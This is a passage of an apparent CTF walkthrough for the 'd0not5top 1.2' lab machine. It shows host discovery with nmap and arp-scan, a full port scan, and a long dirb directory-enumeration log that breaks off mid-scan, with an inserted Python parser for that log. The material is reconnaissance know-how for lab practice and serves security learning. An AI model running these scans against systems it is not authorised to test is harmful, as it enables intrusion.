Canyoupwn.me ~

TR | d0not5top: 1.2 Walkthrough

This machine is rated as hard, and it gave me quite a bit of trouble too 🙂 The IP address changes in some places because I solved the machine over a long period while connected to different networks.


To find the machine's IP address I run the command sudo nmap 172.189.64.0/24. If there had been many devices on my network, I could have used netdiscover or an ARP scan instead. For example, when I was working on a shared network, running nmap would have taken a long time, so I scanned with the command sudo arp-scan 172.189.64.0/24.


I scan the machine's open ports with the command sudo nmap -sS -sV 192.168.1.22 -p- -A.

To examine the HTTP service running on port 80, I run the command dirb http://192.168.1.22 and look at the requests on the site that return 200.
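The dirb output that follows is long and mostly repeats one pattern: nested admin/ directories whose index.php returns 200 with SIZE:0. The following is an added example, not part of the original post: a Python triage that separates those empty trees from listable directories, restricted paths and real content. The sample input is a shortened excerpt of this page's output, and the function names are this example's own.

```python
import re
from urllib.parse import urlparse

# Shortened excerpt of the dirb output shown on this page.
SAMPLE = """\
---- Scanning URL: http://192.168.1.22/ ----
==> DIRECTORY: http://192.168.1.22/archive/
==> DIRECTORY: http://192.168.1.22/control/
==> DIRECTORY: http://192.168.1.22/games/
+ http://192.168.1.22/index.html (CODE:200|SIZE:211)
+ http://192.168.1.22/robots.txt (CODE:200|SIZE:695)
+ http://192.168.1.22/server-status (CODE:403|SIZE:222)

---- Entering directory: http://192.168.1.22/archive/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/
+ http://192.168.1.22/archive/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.22/control/ ----
+ http://192.168.1.22/control/index.html (CODE:200|SIZE:6814)
+ http://192.168.1.22/control/LICENSE (CODE:200|SIZE:11336)

---- Entering directory: http://192.168.1.22/games/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.22/archive/admin/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/
+ http://192.168.1.22/archive/admin/index.php (CODE:200|SIZE:0)
"""

HIT_RE = re.compile(r"^\+ (\S+) \(CODE:(\d+)\|SIZE:(\d+)\)")
DIR_RE = re.compile(r"^==> DIRECTORY: (\S+)")
ENTER_RE = re.compile(r"^---- (?:Scanning URL|Entering directory): (\S+) ----")


def parse_dirb(text):
    """Return (hits, dirs, listable) parsed from dirb's text output."""
    hits, dirs, listable = [], [], []
    current = None  # directory dirb is scanning at this point in the log
    for raw in text.splitlines():
        line = raw.rstrip()  # dirb pads lines with trailing spaces
        if m := ENTER_RE.match(line):
            current = m.group(1)
        elif m := DIR_RE.match(line):
            dirs.append(m.group(1))
        elif m := HIT_RE.match(line):
            hits.append((m.group(1), int(m.group(2)), int(m.group(3))))
        elif "Directory IS LISTABLE" in line and current:
            listable.append(current)
    return hits, dirs, listable


def top_segment(url):
    """First path component of a nested URL; '' for files in the web root."""
    parts = [p for p in urlparse(url).path.split("/") if p]
    return parts[0] if len(parts) > 1 else ""


def triage(text):
    """Group findings by what they mean for the server's exposure."""
    hits, _dirs, listable = parse_dirb(text)
    by_tree = {}
    for url, code, size in hits:
        by_tree.setdefault(top_segment(url), []).append((code, size))
    # A tree in which every response is a zero-byte 200 serves no content.
    empty_trees = sorted(
        tree for tree, responses in by_tree.items()
        if tree and all(c == 200 and s == 0 for c, s in responses)
    )
    return {
        "listable": listable,  # auto-indexing is switched on
        "empty_trees": empty_trees,
        "content": [u for u, c, s in hits if c == 200 and s > 0],
        "restricted": [u for u, c, s in hits if c in (401, 403)],
    }


if __name__ == "__main__":
    for category, items in triage(SAMPLE).items():
        print(category, items)
```
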

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 12 12:40:20 2017
URL_BASE: http://192.168.1.22/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.22/ ----
==> DIRECTORY: http://192.168.1.22/archive/                                    
==> DIRECTORY: http://192.168.1.22/blog/                                       
==> DIRECTORY: http://192.168.1.22/contact/                                    
==> DIRECTORY: http://192.168.1.22/control/                                    
==> DIRECTORY: http://192.168.1.22/feed/                                       
==> DIRECTORY: http://192.168.1.22/games/                                      
+ http://192.168.1.22/index.html (CODE:200|SIZE:211)                           
==> DIRECTORY: http://192.168.1.22/manual/                                     
==> DIRECTORY: http://192.168.1.22/mint/                                       
==> DIRECTORY: http://192.168.1.22/phpmyadmin/                                 
==> DIRECTORY: http://192.168.1.22/plugins/                                    
+ http://192.168.1.22/robots.txt (CODE:200|SIZE:695)                           
==> DIRECTORY: http://192.168.1.22/search/                                     
+ http://192.168.1.22/server-status (CODE:403|SIZE:222)                        
==> DIRECTORY: http://192.168.1.22/support/                                    
==> DIRECTORY: http://192.168.1.22/tag/                                        
==> DIRECTORY: http://192.168.1.22/themes/                                     
==> DIRECTORY: http://192.168.1.22/trackback/                                  
==> DIRECTORY: http://192.168.1.22/wp-admin/                                   
==> DIRECTORY: http://192.168.1.22/wp-content/                                 
==> DIRECTORY: http://192.168.1.22/wp-includes/                                
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/                                 
                                                                               
---- Entering directory: http://192.168.1.22/archive/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/                              
+ http://192.168.1.22/archive/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/blog/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/                                 
+ http://192.168.1.22/blog/index.php (CODE:200|SIZE:0)                         
                                                                               
---- Entering directory: http://192.168.1.22/contact/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/                              
+ http://192.168.1.22/contact/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/control/ ----
==> DIRECTORY: http://192.168.1.22/control/css/                                
==> DIRECTORY: http://192.168.1.22/control/fonts/                              
+ http://192.168.1.22/control/index.html (CODE:200|SIZE:6814)                  
==> DIRECTORY: http://192.168.1.22/control/js/                                 
+ http://192.168.1.22/control/LICENSE (CODE:200|SIZE:11336)                    
                                                                               
---- Entering directory: http://192.168.1.22/feed/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/                                 
+ http://192.168.1.22/feed/index.php (CODE:200|SIZE:0)                         
                                                                               
---- Entering directory: http://192.168.1.22/games/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/manual/ ----
==> DIRECTORY: http://192.168.1.22/manual/da/                                  
==> DIRECTORY: http://192.168.1.22/manual/de/                                  
==> DIRECTORY: http://192.168.1.22/manual/en/                                  
==> DIRECTORY: http://192.168.1.22/manual/es/                                  
==> DIRECTORY: http://192.168.1.22/manual/fr/                                  
==> DIRECTORY: http://192.168.1.22/manual/images/                              
+ http://192.168.1.22/manual/index.html (CODE:200|SIZE:626)                    
==> DIRECTORY: http://192.168.1.22/manual/ja/                                  
==> DIRECTORY: http://192.168.1.22/manual/ko/                                  
==> DIRECTORY: http://192.168.1.22/manual/style/                               
==> DIRECTORY: http://192.168.1.22/manual/tr/                                  
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/                               
                                                                               
---- Entering directory: http://192.168.1.22/mint/ ----
==> DIRECTORY: http://192.168.1.22/mint/admin/                                 
+ http://192.168.1.22/mint/index.php (CODE:200|SIZE:0)                         
                                                                               
---- Entering directory: http://192.168.1.22/phpmyadmin/ ----
+ http://192.168.1.22/phpmyadmin/index.html (CODE:200|SIZE:154472)             
                                                                               
---- Entering directory: http://192.168.1.22/plugins/ ----
==> DIRECTORY: http://192.168.1.22/plugins/admin/                              
+ http://192.168.1.22/plugins/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/search/ ----
==> DIRECTORY: http://192.168.1.22/search/admin/                               
+ http://192.168.1.22/search/index.php (CODE:200|SIZE:0)                       
                                                                               
---- Entering directory: http://192.168.1.22/support/ ----
==> DIRECTORY: http://192.168.1.22/support/admin/                              
+ http://192.168.1.22/support/index.php (CODE:200|SIZE:0)                      
                                                                               
---- Entering directory: http://192.168.1.22/tag/ ----
==> DIRECTORY: http://192.168.1.22/tag/admin/                                  
+ http://192.168.1.22/tag/index.php (CODE:200|SIZE:0)                          
                                                                               
---- Entering directory: http://192.168.1.22/themes/ ----
==> DIRECTORY: http://192.168.1.22/themes/admin/                               
+ http://192.168.1.22/themes/index.php (CODE:200|SIZE:0)                       
                                                                               
---- Entering directory: http://192.168.1.22/trackback/ ----
==> DIRECTORY: http://192.168.1.22/trackback/admin/                            
+ http://192.168.1.22/trackback/index.php (CODE:200|SIZE:0)                    
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/ ----
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/                             
+ http://192.168.1.22/wp-admin/index.php (CODE:200|SIZE:0)                     
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/ ----
==> DIRECTORY: http://192.168.1.22/wp-content/admin/                           
+ http://192.168.1.22/wp-content/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/ ----
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/                          
+ http://192.168.1.22/wp-includes/index.php (CODE:200|SIZE:0)                  
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/ ----
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/                           
+ http://192.168.1.22/xmlrpc.php/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/                      
+ http://192.168.1.22/archive/admin/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/blog/                            
+ http://192.168.1.22/blog/admin/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/contact/                      
+ http://192.168.1.22/contact/admin/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.1.22/control/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/control/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/control/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/feed/                            
+ http://192.168.1.22/feed/admin/index.php (CODE:200|SIZE:0)                   
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/ ----
==> DIRECTORY: http://192.168.1.22/manual/da/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/da/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/da/howto/                            
+ http://192.168.1.22/manual/da/index.html (CODE:200|SIZE:9041)                
==> DIRECTORY: http://192.168.1.22/manual/da/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/da/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/da/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/da/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/ ----
==> DIRECTORY: http://192.168.1.22/manual/de/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/de/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/de/howto/                            
+ http://192.168.1.22/manual/de/index.html (CODE:200|SIZE:9290)                
==> DIRECTORY: http://192.168.1.22/manual/de/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/de/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/de/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/de/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/ ----
==> DIRECTORY: http://192.168.1.22/manual/en/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/en/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/en/howto/                            
+ http://192.168.1.22/manual/en/index.html (CODE:200|SIZE:9206)                
==> DIRECTORY: http://192.168.1.22/manual/en/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/en/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/en/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/en/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/ ----
==> DIRECTORY: http://192.168.1.22/manual/es/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/es/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/es/howto/                            
+ http://192.168.1.22/manual/es/index.html (CODE:200|SIZE:9255)                
==> DIRECTORY: http://192.168.1.22/manual/es/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/es/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/es/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/es/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/ ----
==> DIRECTORY: http://192.168.1.22/manual/fr/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/fr/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/fr/howto/                            
+ http://192.168.1.22/manual/fr/index.html (CODE:200|SIZE:9479)                
==> DIRECTORY: http://192.168.1.22/manual/fr/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/fr/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/fr/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/fr/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/ ----
==> DIRECTORY: http://192.168.1.22/manual/ja/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/ja/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/ja/howto/                            
+ http://192.168.1.22/manual/ja/index.html (CODE:200|SIZE:9649)                
==> DIRECTORY: http://192.168.1.22/manual/ja/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/ja/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/ja/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/ja/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/ ----
==> DIRECTORY: http://192.168.1.22/manual/ko/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/ko/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/ko/howto/                            
+ http://192.168.1.22/manual/ko/index.html (CODE:200|SIZE:8513)                
==> DIRECTORY: http://192.168.1.22/manual/ko/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/ko/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/ko/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/ko/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/ ----
==> DIRECTORY: http://192.168.1.22/manual/tr/developer/                        
==> DIRECTORY: http://192.168.1.22/manual/tr/faq/                              
==> DIRECTORY: http://192.168.1.22/manual/tr/howto/                            
+ http://192.168.1.22/manual/tr/index.html (CODE:200|SIZE:9416)                
==> DIRECTORY: http://192.168.1.22/manual/tr/misc/                             
==> DIRECTORY: http://192.168.1.22/manual/tr/mod/                              
==> DIRECTORY: http://192.168.1.22/manual/tr/programs/                         
==> DIRECTORY: http://192.168.1.22/manual/tr/ssl/                              
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/ ----
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/developer/                     
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/faq/                           
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/howto/                         
+ http://192.168.1.22/manual/zh-cn/index.html (CODE:200|SIZE:8884)             
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/misc/                          
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/mod/                           
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/programs/                      
==> DIRECTORY: http://192.168.1.22/manual/zh-cn/ssl/                           
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/ ----
+ http://192.168.1.22/mint/admin/index.php (CODE:200|SIZE:0)                   
==> DIRECTORY: http://192.168.1.22/mint/admin/mint/                            
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/ ----
+ http://192.168.1.22/plugins/admin/index.php (CODE:200|SIZE:0)                
==> DIRECTORY: http://192.168.1.22/plugins/admin/plugins/                      
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/ ----
+ http://192.168.1.22/search/admin/index.php (CODE:200|SIZE:0)                 
==> DIRECTORY: http://192.168.1.22/search/admin/search/                        
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/ ----
+ http://192.168.1.22/support/admin/index.php (CODE:200|SIZE:0)                
==> DIRECTORY: http://192.168.1.22/support/admin/support/                      
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/ ----
+ http://192.168.1.22/tag/admin/index.php (CODE:200|SIZE:0)                    
==> DIRECTORY: http://192.168.1.22/tag/admin/tag/                              
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/ ----
+ http://192.168.1.22/themes/admin/index.php (CODE:200|SIZE:0)                 
==> DIRECTORY: http://192.168.1.22/themes/admin/themes/                        
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/ ----
+ http://192.168.1.22/trackback/admin/index.php (CODE:200|SIZE:0)              
==> DIRECTORY: http://192.168.1.22/trackback/admin/trackback/                  
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/ ----
+ http://192.168.1.22/wp-admin/admin/index.php (CODE:200|SIZE:0)               
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/wp-admin/                    
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/ ----
+ http://192.168.1.22/wp-content/admin/index.php (CODE:200|SIZE:0)             
==> DIRECTORY: http://192.168.1.22/wp-content/admin/wp-content/                
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/ ----
+ http://192.168.1.22/wp-includes/admin/index.php (CODE:200|SIZE:0)            
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/wp-includes/              
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/ ----
+ http://192.168.1.22/xmlrpc.php/admin/index.php (CODE:200|SIZE:0)             
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/                
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/archive/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/1/                    
+ http://192.168.1.22/archive/admin/archive/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/blog/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/blog/1/                          
+ http://192.168.1.22/blog/admin/blog/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/contact/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/contact/1/                    
+ http://192.168.1.22/contact/admin/contact/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/feed/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/feed/1/                          
+ http://192.168.1.22/feed/admin/feed/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/developer/ ----
+ http://192.168.1.22/manual/da/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/faq/ ----
+ http://192.168.1.22/manual/da/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/howto/ ----
+ http://192.168.1.22/manual/da/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/misc/ ----
+ http://192.168.1.22/manual/da/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/mod/ ----
+ http://192.168.1.22/manual/da/mod/index.html (CODE:200|SIZE:22377)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/programs/ ----
+ http://192.168.1.22/manual/da/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/da/ssl/ ----
+ http://192.168.1.22/manual/da/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/developer/ ----
+ http://192.168.1.22/manual/de/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/faq/ ----
+ http://192.168.1.22/manual/de/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/howto/ ----
+ http://192.168.1.22/manual/de/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/misc/ ----
+ http://192.168.1.22/manual/de/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/mod/ ----
+ http://192.168.1.22/manual/de/mod/index.html (CODE:200|SIZE:22569)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/programs/ ----
+ http://192.168.1.22/manual/de/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/de/ssl/ ----
+ http://192.168.1.22/manual/de/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/developer/ ----
+ http://192.168.1.22/manual/en/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/faq/ ----
+ http://192.168.1.22/manual/en/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/howto/ ----
+ http://192.168.1.22/manual/en/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/misc/ ----
+ http://192.168.1.22/manual/en/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/mod/ ----
+ http://192.168.1.22/manual/en/mod/index.html (CODE:200|SIZE:22377)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/programs/ ----
+ http://192.168.1.22/manual/en/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/en/ssl/ ----
+ http://192.168.1.22/manual/en/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/developer/ ----
+ http://192.168.1.22/manual/es/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/faq/ ----
+ http://192.168.1.22/manual/es/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/howto/ ----
+ http://192.168.1.22/manual/es/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/misc/ ----
+ http://192.168.1.22/manual/es/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/mod/ ----
+ http://192.168.1.22/manual/es/mod/index.html (CODE:200|SIZE:22752)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/programs/ ----
+ http://192.168.1.22/manual/es/programs/index.html (CODE:200|SIZE:6298)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/es/ssl/ ----
+ http://192.168.1.22/manual/es/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/developer/ ----
+ http://192.168.1.22/manual/fr/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/faq/ ----
+ http://192.168.1.22/manual/fr/faq/index.html (CODE:200|SIZE:3604)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/howto/ ----
+ http://192.168.1.22/manual/fr/howto/index.html (CODE:200|SIZE:7136)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/misc/ ----
+ http://192.168.1.22/manual/fr/misc/index.html (CODE:200|SIZE:5407)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/mod/ ----
+ http://192.168.1.22/manual/fr/mod/index.html (CODE:200|SIZE:24329)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/programs/ ----
+ http://192.168.1.22/manual/fr/programs/index.html (CODE:200|SIZE:7185)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/fr/ssl/ ----
+ http://192.168.1.22/manual/fr/ssl/index.html (CODE:200|SIZE:5191)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/developer/ ----
+ http://192.168.1.22/manual/ja/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/faq/ ----
+ http://192.168.1.22/manual/ja/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/howto/ ----
+ http://192.168.1.22/manual/ja/howto/index.html (CODE:200|SIZE:7723)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/misc/ ----
+ http://192.168.1.22/manual/ja/misc/index.html (CODE:200|SIZE:5106)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/mod/ ----
+ http://192.168.1.22/manual/ja/mod/index.html (CODE:200|SIZE:23684)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/programs/ ----
+ http://192.168.1.22/manual/ja/programs/index.html (CODE:200|SIZE:6897)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/ja/ssl/ ----
+ http://192.168.1.22/manual/ja/ssl/index.html (CODE:200|SIZE:5274)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/developer/ ----
+ http://192.168.1.22/manual/ko/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/faq/ ----
+ http://192.168.1.22/manual/ko/faq/index.html (CODE:200|SIZE:3602)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/howto/ ----
+ http://192.168.1.22/manual/ko/howto/index.html (CODE:200|SIZE:6373)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/misc/ ----
+ http://192.168.1.22/manual/ko/misc/index.html (CODE:200|SIZE:5197)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/mod/ ----
+ http://192.168.1.22/manual/ko/mod/index.html (CODE:200|SIZE:21813)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/programs/ ----
+ http://192.168.1.22/manual/ko/programs/index.html (CODE:200|SIZE:5773)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/ko/ssl/ ----
+ http://192.168.1.22/manual/ko/ssl/index.html (CODE:200|SIZE:5049)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/developer/ ----
+ http://192.168.1.22/manual/tr/developer/index.html (CODE:200|SIZE:5892)      
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/faq/ ----
+ http://192.168.1.22/manual/tr/faq/index.html (CODE:200|SIZE:3612)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/howto/ ----
+ http://192.168.1.22/manual/tr/howto/index.html (CODE:200|SIZE:6962)          
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/misc/ ----
+ http://192.168.1.22/manual/tr/misc/index.html (CODE:200|SIZE:5339)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/mod/ ----
+ http://192.168.1.22/manual/tr/mod/index.html (CODE:200|SIZE:22660)           
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/programs/ ----
+ http://192.168.1.22/manual/tr/programs/index.html (CODE:200|SIZE:7405)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/tr/ssl/ ----
+ http://192.168.1.22/manual/tr/ssl/index.html (CODE:200|SIZE:5196)            
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/developer/ ----
+ http://192.168.1.22/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)   
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/faq/ ----
+ http://192.168.1.22/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)         
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/howto/ ----
+ http://192.168.1.22/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)       
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/misc/ ----
+ http://192.168.1.22/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)        
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/mod/ ----
+ http://192.168.1.22/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)        
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/programs/ ----
+ http://192.168.1.22/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833)    
                                                                               
---- Entering directory: http://192.168.1.22/manual/zh-cn/ssl/ ----
+ http://192.168.1.22/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)         
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/mint/ ----
==> DIRECTORY: http://192.168.1.22/mint/admin/mint/1/                          
+ http://192.168.1.22/mint/admin/mint/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/plugins/ ----
